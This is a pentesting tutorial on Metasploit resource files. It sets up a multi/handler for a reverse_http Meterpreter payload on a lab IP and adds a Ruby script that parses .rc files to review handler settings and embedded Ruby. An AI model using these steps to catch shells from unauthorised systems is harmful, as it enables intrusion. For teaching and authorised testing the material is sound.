In this series, I have been trying to familiarize you with the many features of the world’s best framework for exploitation, hacking, and pentesting, Metasploit. There are so many features, and techniques for using those features, that few pentesters/hackers are aware of all of them.
Many times, when doing a pentest/hack, we need to run a number of Metasploit commands repeatedly. These commands may be exactly the same each time, and just like scripting, we may need to automatically run multiple Metasploit commands in a single step. Metasploit has the capability to save and store these “scripts,” and they can then be recalled by the script name. Metasploit calls these scripts resource files.
For example, in many attacks, we need to set up a multi/handler to connect to when a payload is executed on a target system. In my new Powersploit series, or with the web delivery Metasploit module, we will always need to set a multi/handler to receive the connections from a sent payload. This usually involves several commands: using the multi/handler, setting the port, setting the payload, setting the IP, and so on. To make things easier, we can store all of these commands in a resource file and simply run a single command to execute all of them.
Now that you have a better idea of when these would be useful, let’s take a look at Metasploit’s scripting capabilities with resource files.
Step 1: Exploring Resource Scripts in Metasploit
First, let’s take a look at where Metasploit stores its scripts. Let’s navigate to /usr/share/metasploit-framework/scripts/resource, and then do a long listing.
kali > cd /usr/share/metasploit-framework/scripts/resource
kali > ls -l
As you can see, Metasploit has numerous scripts already developed and stored here. Any new script that we write will be stored here as well.
Step 2: Writing Our Own Resource Script
Now let’s create our own simple script to start a multi/handler necessary to receive connections, such as we used in the first Powersploit tutorial. First, start Metasploit, then enter the commands we want in our script.
kali > msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_http
msf > set LHOST 192.168.181.128
msf > set LPORT 4444
When we have completed all of the commands we want in the script, we simply use the keyword makerc followed by the name of the script. For instance, here I named the script handler_http.rc (a multi/handler for HTTP, followed by the Metasploit extension for resource files, rc).
msf > makerc handler_http.rc
Metasploit now saves each of those commands into that script file.
Step 3: Checking the Script Contents
If we want to see what commands are in a script file, we can use one of the many commands in Linux to display the contents of a file, such as cat, less, and more. Here, I used more followed by the resource file name.
msf > more handler_http.rc
Notice that Metasploit now displays the commands in my script file, handler_http.rc.
Step 4: Executing Our New Script File
When we want to execute this script, we simply precede the script name with the keyword resource, such as:
msf > resource handler_http.rc
Metasploit will now run each of the commands in our script automatically. Now simply type exploit to start our handler.
msf > exploit
Step 5: Checking Whether It Was Saved
If we go back to the location where the scripts are stored, we can see that our new script, handler_http.rc, is now stored with the other Metasploit prepackaged scripts.
Step 6: Starting the Script Automatically with Metasploit
If we know before starting Metasploit that we will be using a particular script, we can have Metasploit automatically execute the script upon starting. We do this by starting Metasploit with the msfconsole command and the -r switch, followed by the name of the resource file we want to execute upon opening, such as:
kali > msfconsole -r handler_http.rc
Now, when Metasploit starts, it will automatically execute the handler_http.rc script, and you are ready to go.
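As an added example (my own code, not from the article or the Metasploit project), here is a small Ruby script that reads a resource file the way msfconsole does and summarizes a handler script before you hand it to resource or msfconsole -r. The sample file contents and the print_status line are constructed; the handling of # comments and <ruby> blocks matches how msfconsole loads a resource file, which is worth knowing because any Ruby embedded in a script you did not write yourself runs with the full privileges of the console.

```ruby
# Added example, not from the article: parse a Metasploit resource file the
# way msfconsole loads one: blank lines and '#' comments are skipped, text
# between <ruby>/</ruby> is Ruby that msfconsole evals, all else is a command.
def parse_resource(text)
  entries = []
  lines = text.each_line.map(&:strip)
  until lines.empty?
    line = lines.shift
    next if line.empty? || line.start_with?('#')
    if line.start_with?('<ruby>')
      buff = +''
      until lines.empty?
        line = lines.shift
        break if line.start_with?('</ruby>')
        buff << line << "\n"
      end
      entries << [:ruby, buff]          # code that will run inside msfconsole
    else
      entries << [:command, line]       # e.g. "set LPORT 4444"
    end
  end
  entries
end
# Review a handler script before resource / msfconsole -r runs it:
# collect the set/setg options and count embedded <ruby> blocks.
def inspect_handler(text)
  opts = {}
  ruby_blocks = 0
  parse_resource(text).each do |kind, body|
    if kind == :ruby
      ruby_blocks += 1
    elsif body =~ /\Asetg?\s+(\S+)\s+(.+)\z/i
      opts[$1.upcase] = $2
    end
  end
  missing = %w[PAYLOAD LHOST LPORT] - opts.keys
  { options: opts, missing: missing, ruby_blocks: ruby_blocks }
end
# Constructed sample in the spirit of the article's handler_http.rc.
SAMPLE_RC = <<~RC
  # reverse HTTP handler
  use exploit/multi/handler
  set PAYLOAD windows/meterpreter/reverse_http
  set LHOST 192.168.181.128
  set LPORT 4444
  <ruby>
  print_status("handler options loaded")
  </ruby>
  exploit -j
RC
```

Running inspect_handler(SAMPLE_RC) reports the three handler options, no missing settings, and one embedded Ruby block; a script that sets only PAYLOAD is flagged as missing LHOST and LPORT.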